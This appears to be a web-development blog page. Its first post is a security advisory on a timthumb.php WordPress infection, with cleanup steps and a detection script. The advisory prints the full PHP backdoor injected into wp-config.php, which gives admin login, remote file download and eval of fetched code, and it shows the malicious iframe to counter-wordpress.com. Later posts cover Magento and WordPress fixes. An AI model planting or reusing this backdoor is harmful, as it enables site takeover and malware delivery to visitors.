New WordPress Malware Attack Exploiting timthumb.php Script

A new malware infection has been affecting thousands of WordPress sites that use the popular timthumb.php image resizing script. Hackers create backdoor access to your website and inject malicious JavaScript that attempts to download various Trojans and other malware onto your visitors’ computers. At this stage of the infection the attackers are also modifying two WordPress core files: /wp-config.php and /wp-includes/js/l10n.js.

The wp-config.php file gets the following new lines of code, which give hackers backdoor access to your website:

    if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
        if ($_GET['pass'] == '66f041e16a60928b05a7e228a89c3799') {
            // 'login': signs the requester in as the 'admin' user
            if ($_GET['pingnow'] == 'login') {
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            // 'exec': saves the URL given in 'file' as a new .php file on the server
            if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0,100)).'.php';
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "// ";
            }
            // 'eval': fetches the URL given in 'file' and runs the response with eval()
            if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }

The attackers also add an obfuscated block of JavaScript, starting with var _0x4de4=[ and wrapped in eval(), to your l10n.js file. This appends an iframe to the bottom of your blog through which they can inject future malware:

    <iframe id="iframe" src="http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px; "></iframe>

Solution

- Immediately remove or update the timthumb.php script. When removing it, don’t forget to also update the theme files that rely on this functionality.
- Delete the cache folder located in the root of your template.
- Remove the code above from your wp-config.php file. Normally, the last line of that file should read:

      require_once(ABSPATH . 'wp-settings.php');

- Remove the injected code from the /wp-includes/js/l10n.js file.
- Update all WordPress and FTP passwords for good...
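A defender-side check for the indicators this post lists (the pingnow code in wp-config.php, the _0x4de4 loader or counter-wordpress.com reference in l10n.js, a remaining timthumb.php, and files written by the 'exec' branch), as an added example that is not part of the original post. The function names and the sample tree are constructed for illustration; because md5(rand(0,100)) has only 101 possible values, the dropped file names can be enumerated.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# md5(rand(0,100)).'.php' in the 'exec' branch can only yield 101 file names.
DROPPED_NAMES = {hashlib.md5(str(n).encode()).hexdigest() + ".php" for n in range(101)}
BACKDOOR_RE = re.compile(r"""\$_GET\[\s*['"]pingnow['"]\s*\]""")
L10N_RE = re.compile(r"_0x4de4|counter-wordpress\.com")


def scan(root):
    """Return sorted (relative_path, finding) pairs for a WordPress tree."""
    root, findings = Path(root), []
    for path in (p for p in root.rglob("*") if p.is_file()):
        rel, name = path.relative_to(root).as_posix(), path.name.lower()
        if name in DROPPED_NAMES:
            findings.append((rel, "name matches md5(0..100).php dropper pattern"))
        if name == "timthumb.php":
            findings.append((rel, "timthumb.php present: remove or update"))
        if name == "wp-config.php" and BACKDOOR_RE.search(path.read_text(errors="replace")):
            findings.append((rel, "pingnow backdoor code"))
        if rel.endswith("wp-includes/js/l10n.js") and L10N_RE.search(path.read_text(errors="replace")):
            findings.append((rel, "injected loader in l10n.js"))
    return sorted(findings)


def make_sample(root):
    """Build a small constructed (not real) infected tree under root."""
    files = {
        "wp-config.php": "<?php\nrequire_once(ABSPATH . 'wp-settings.php');\n"
                         "if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ /* ... */ }\n",
        "wp-includes/js/l10n.js": "var _0x4de4=[/* packed */];\n",
        "wp-content/themes/demo/timthumb.php": "<?php // resizer\n",
        "wp-admin/" + hashlib.md5(b"42").hexdigest() + ".php": "<?php // dropped\n",
        "wp-content/themes/demo/index.php": "<?php // clean\n",
    }
    for rel, body in files.items():
        Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
        Path(root, rel).write_text(body)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, finding in scan(make_sample(tmp)):
            print(f"{rel}: {finding}")
```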

Magento 1.5.0.1 – Problem Importing Images with Advanced DataFlow Profiles

Software
Magento 1.5.0.1

Server Environment
(dedicated) Linux/Windows, Apache, PHP, MySQL

Problem Description
After upgrading to version 1.5.0.1 of Magento, CSV-based import does not import images. All other product information is imported correctly, but images are ignored.

Workaround (solution pending)
Upgrade to the latest version of Magento (at the moment it is ver. 1.5.1.0-beta1). Create a new import profile just for images and bring them in separately. To do so, follow the steps below:

1. Go to System > Import/Export > Dataflow – Profiles.
2. Click Add New Profile.
3. Set up a profile and select NO for “Original Magento attribute names in first row” (see attached screenshot).
4. Map the fields to the ones in your CSV.
5. Save and run the profile with your CSV.

As long as the product is already imported, the image CSV can just have the sku, image, thumbnail and small_image fields. If the product does not exist, you’ll get an error on that line. Hope this helps...

Magento 1.5.0.1 – SQLSTATE[42S02]: Base table or view not found…

Software
Magento 1.5.0.1

Server Environment
(dedicated) Linux, Apache, PHP, MySQL

Problem Description
When using the Insert Image function in Magento’s WYSIWYG editor, the Create Folder function results in the following error:

    SQLSTATE[42S02]: Base table or view not found: 1146 Table 'colorado_soybu.magento_core_directory_storage' doesn't exist

Solution
The issue is caused by a missing “core_directory_storage” table. To remedy it, you’ll need to run the following command on your MySQL database (please make sure that you replace the “mag_” table prefix with your own):

    CREATE TABLE IF NOT EXISTS mag_core_directory_storage (
      `directory_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
      `name` varchar(255) NOT NULL DEFAULT '',
      `path` varchar(255) NOT NULL DEFAULT '',
      `upload_time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
      `parent_id` int(10) unsigned DEFAULT NULL,
      PRIMARY KEY (`directory_id`),
      UNIQUE KEY `IDX_DIRECTORY_PATH` (`name`, `path`),
      KEY `parent_id` (`parent_id`),
      CONSTRAINT `FK_DIRECTORY_PARENT_ID` FOREIGN KEY (`parent_id`)
        REFERENCES mag_core_directory_storage (`directory_id`)
        ON DELETE CASCADE ON UPDATE CASCADE
    ) ENGINE=InnoDB DEFAULT...

WordPress and iFrames

iFrames are coming! As you may have already noticed, your favorite video sharing websites like Vimeo & YouTube have begun introducing iFrame-based syndication of their embeddable players. While this offers a variety of new features, like iPad support for embedded videos, it might be very challenging for WordPress bloggers to insert iFrame-based code into their blog posts. By default, such code would be filtered out by TinyMCE – WordPress’ WYSIWYG (or Rich Text) editor.

Fear not, the solution is simple enough. Just add the following code to the functions.php file of your template, and voilà – life is beautiful once more.

    function add_iframe($initArray) {
        // Allow <iframe> and the listed attributes through TinyMCE's element filter
        $initArray['extended_valid_elements'] = "iframe[id|class|title|style|align|frameborder|height|longdesc|marginheight|marginwidth|name|scrolling|src|width]";
        return $initArray;
    }
    add_filter('tiny_mce_before_init',...
